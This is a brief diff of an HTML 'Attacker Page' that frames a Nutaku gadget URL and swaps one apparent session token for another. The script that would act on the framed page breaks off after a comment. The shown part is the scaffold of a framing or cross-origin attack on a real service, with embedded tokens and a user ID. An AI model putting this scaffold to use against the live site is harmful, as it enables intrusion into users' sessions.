--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=T%2BR%2F3gMyw1KFtLA1ex%2FAvvxnIy0EOHv2HBEAlJ56ZfabDprGUqbHbaWsx9uvhtfypKj8Z%2FKHqCuHIAJ2tqF7ry1y772XbhmlpLaX0Ex8M6dmAUKNtDK87yaZ%2FzTRTsjGLeFPrcIwBmUd2YAVvYXRZOMrE7lTMlhxEJLNyAAzohHzEA9N319avXd3JXgJaB4uZCSqZKj1Ec8n9Pi0N6aaQ99wDJFmQqTd9eoVp1nOioYZQzIBjVN7hPi6oAM27Iqy%2FyI93bBMDCmMHuem6SxMmxiF0zI%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=z8tpzDIh2RQigAYRtNMJhRTfqehwG8S08uBU0s6C1gQEzUhSkeVuicl7lkA07SJ6yR9nWBLuY7ljrgSvh52x%2F6MSLvHT6ouBQkxCCgHBCk28yGPbW%2FXcXVwRBi%2FnwUoo1lCpd9gunknX3VKrZOjNq1LEA2JoyG%2Ft0Mlqp3Pl6dqImon2aAZMAfllFt7mkyutdJcFrFsMaBqGKDIgjTzLJKYj3dJSld94FuJm91h1i8ehsa1P7keM81YISTxgSi%2FjgzgUlut6lD%2BeJ9VqgkR%2F3EAkNjw%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
